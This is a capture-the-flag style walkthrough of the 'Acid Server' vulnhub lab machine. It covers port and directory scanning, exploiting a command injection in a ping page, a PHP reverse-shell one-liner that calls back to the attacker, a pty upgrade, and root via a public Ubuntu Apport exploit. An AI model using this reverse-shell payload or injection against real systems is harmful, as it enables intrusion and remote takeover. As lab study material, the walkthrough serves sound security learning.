Acid Server


  • netdiscover
  • Nmap
  • Wfuzz
  • DirBuster
  • Burp


Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation

Use netdiscover to detect target IP address

netdiscover -i eth0 -r the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

port 33447 is open and running http service.

run wfuzz,

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null

find a path Challenge

use DirBuster, check

Check cake.php

check source code,

find /Magic_Box may be a hidden path

use DirBuster again,

command.php looks interesting.

check that page:

type and use Burp

looks like it pings the IP address I typed

<img src="/images/blog/vulhub/acid_server/Selection_010.png" title="[title manually exploit [alt text]]" >

now try;id

<img src="/images/blog/vulhub/acid_server/Selection_011.png" title="[title manually exploit [alt text]]" >

works. So there is a command injection vulnerability.

In burp, instead of id command, using (URL encode):

php -r '$sock=fsockopen("",443);exec("/bin/sh -i <&3 >&3 2>&3");'

get the shell

<img src="/images/blog/vulhub/acid_server/Selection_012.png" title="[title manually exploit [alt text]]" >

python -c 'import pty; pty.spawn("/bin/bash")'

after some enumeration

cat /etc/*-release

<img src="/images/blog/vulhub/acid_server/Selection_013.png" title="[title manually exploit [alt text]]" >

Target is running Ubuntu 15.04

earchsploit ubuntu | grep 15.04

<img src="/images/blog/vulhub/acid_server/Selection_014.png" title="[title manually exploit [alt text]]" >

Since the target doesn’t have wget and gcc, I setup ftp srever and compile the code locally and upload it.

get root

<img src="/images/blog/vulhub/acid_server/Selection_015.png" title="[title manually exploit [alt text]]" >